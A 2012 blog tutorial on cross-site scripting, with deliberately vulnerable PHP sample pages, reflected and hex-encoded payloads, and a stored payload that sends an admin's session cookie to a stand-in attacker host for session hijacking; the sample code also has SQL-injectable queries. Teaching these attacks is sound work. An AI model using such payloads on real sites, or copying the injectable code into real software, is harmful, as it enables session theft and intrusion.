XSS Attack Examples (Cross-Site Scripting Attacks)

by Lakshmanan Ganapathy on February 16, 2012

In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a different kind of attack called XXS attacks.

XSS stands for Cross Site Scripting.

XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Types of Cross Site Scripting

XSS attacks are broadly classified into 2 types:

  1. Non-Persistent
  2. Persistent

1. Non-Persistent XSS Attack

In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS

index.php:

<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo "<a href="http://xssattackexamples.com/">Click to Download</a>";
?>

Example 1:

Now the attacker will craft an URL as follows and send it to the victim:

index.php?name=guest<script>alert('attacked')</script>

When the victim load the above URL into the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.

Example 2:

For example, the attacker can now try to change the “Target URL” of the link “Click to Download”. Instead of the link going to “xssattackexamples.com” website, he can redirect it to go “not-real-xssattackexamples.com” by crafting the URL as shown below:

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

In the above, we called the function to execute on “window.onload”. Because the website (i.e index.php) first echos the given name and then only it draws the <a> tag. So if we write directly like the one shown below, it will not work, because those statements will get executed before the <a> tag is echoed

index.php?name=<script>var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com"</script>

Normally an attacker tends not to craft the URL which a human can directly read. So he will encode the ASCII characters to hex as follows.

index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

which is same as:

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

Now the victim may not know what it is, because directly he cannot understand that the URL is crafted and their is a more chance that he can visit the URL.

2. Persistent XSS Attack

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.

Session

HTTP protocol is a stateless protocol, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other. But most of the web application don’t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the “Sessions”.

When the user login for the first time, a session ID will be created by the web server and it will be sent to the web-browser as “cookie”. All the sub-sequent request to the web server, will be based on the “session id” in the cookie.

Examples for Persistent XSS Attack

This sample web application we’ve given below that demonstrates the persistent XSS attack does the following:

  • There are two types of users: “Admin” and “Normal” user.
  • When “Admin” log-in, he can see the list of usernames. When “Normal” users log-in, they can only update their display name.

login.php:

<?php
$Host= '192.168.1.8';
$Dbname= 'app';
$User= 'yyy';
$Password= 'xxx';
$Schema = 'test';

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
}

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";

$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);

$user_pass = md5($_POST['pass_word']);
$user_name = $row['user_name'];

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login failed";
}
else {
 # Start the session
 session_start();
 $_SESSION['USER_NAME'] = $user_name;
 echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
}
?>

home.php:

<?php
session_start();
if(!$_SESSION['USER_NAME']) {
 echo "Need to login";
}
else {
 $Host= '192.168.1.8';
 $Dbname= 'app';
 $User= 'yyy';
 $Password= 'xxx';
 $Schema = 'test';
 $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
 $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
 if($_SERVER['REQUEST_METHOD'] == "POST") {
  $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';";
  pg_query($Connect,$query);
  echo "Update Success";
 }
 else {
  if(strcmp($_SESSION['USER_NAME'],'admin')==0) {
   echo "Welcome admin<br><hr>";
   echo "List of user's are<br>";
   $query = "select display_name from $Schema.members where user_name!='admin'";
   $res = pg_query($Connect,$query);
   while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
    echo "$row[display_name]<br>";
   }
 }
 else {
  echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
  echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
  echo "<input type=\"submit\" value=\"Update\">";
 }
}
}
?>

Now the attacker log-in as a normal user, and he will enter the following in the textbox as his display name:

<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>

The above information entered by the attacker will be stored in the database (persistent).

Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired. The cookie information will be something like the following:

xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3

Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until PHPSESSID expires.

To understand this more, we can use a firefox addon called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3″.

We’ll cover how to use “Tamper Data” in future article of this series.


Linux Sysadmin Course Linux provides several powerful administrative tools and utilities which will help you to manage your systems effectively. If you don’t know what these tools are and how to use them, you could be spending lot of time trying to perform even the basic administrative tasks. The focus of this course is to help you understand system administration tools, which will help you to become an effective Linux system administrator.
Get the Linux Sysadmin Course Now!

If you enjoyed this article, you might also like..

  1. 50 Linux Sysadmin Tutorials
  2. 50 Most Frequently Used Linux Commands (With Examples)
  3. Top 25 Best Linux Performance Monitoring and Debugging Tools
  4. Mommy, I found it! – 15 Practical Linux Find Command Examples
  5. Linux 101 Hacks 2nd Edition eBook Linux 101 Hacks Book

Bash 101 Hacks Book Sed and Awk 101 Hacks Book Nagios Core 3 Book Vim 101 Hacks Book

{ 9 comments… read them below or add one }

1 Julien February 16, 2012 at 10:45 am

Nice article ! covers the basics of XSS, but you forgot to keep hope in you pandora box, just letting people know how to protect themselves from such attacks (SQL Injection, XSS, …): the correct way is always the same ESCAPE

for XSS in php this is as simple as using htmlspecialchars()
http://php.net/manual/en/function.htmlspecialchars.php

while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
echo htmlspecialchars($row[display_name]) . “”;
}

Keep posting good stuffs

2 niraj February 16, 2012 at 10:44 pm

Its really a good article. I dont understand the code because of I am not developer, but I understand the funda, how hackers used that one .

3 Arindam February 28, 2012 at 6:01 am

This is really simple and nice walk through using very simple examples to understand what exactly is happening behind the scene. I have struggled understanding XSS in my earlier days.
I wish I would have had this article before :)

4 Friedrick July 11, 2012 at 3:09 am

I think that is missing a relatively old cathegory, but still very difficult to analyze.
This cathegory is the DOM XSS which can be found here: https://www.owasp.org/index.php/DOM_Based_XSS
This kind of vulnerabilities were historically very hard to spot because hidden in tons of javascript code, which is the most polimorfic kind of language I have ever had to struggle with :D

Have a look at this beautiful resource: http://code.google.com/p/domxsswiki/wiki/Introduction

Fortunately the technology improves over time and now there are some tools to make the job easier:
- http://www.domxssscanner.com (easy to use)
- http://dominator.mindedsecurity.com (opensource and pro trial – very precise and powerful but it crashes from time to time)

5 Kaushik Wavhal December 6, 2012 at 3:09 am

Hey nice article. Specially the two types persistent and non persistent always used to confuse me.
wish i had come up to this article before.

6 pyush September 5, 2013 at 10:00 am

the example are not working for me… please help

7 Bindya January 3, 2014 at 3:51 am

Article is good on xss hack. but it is using script tag. Iframe injuction is also a type of xss. which can load external url to host.

8 Umar Mukthar March 25, 2014 at 10:04 pm

nice article. could you please add some examples to prevent from xss attack in java. It will help me a lot to implement on my project, because I do analysis regarding XSS attack.

9 george April 3, 2014 at 9:56 am

thanks for that explanation

Leave a Comment

Previous post:

Next post: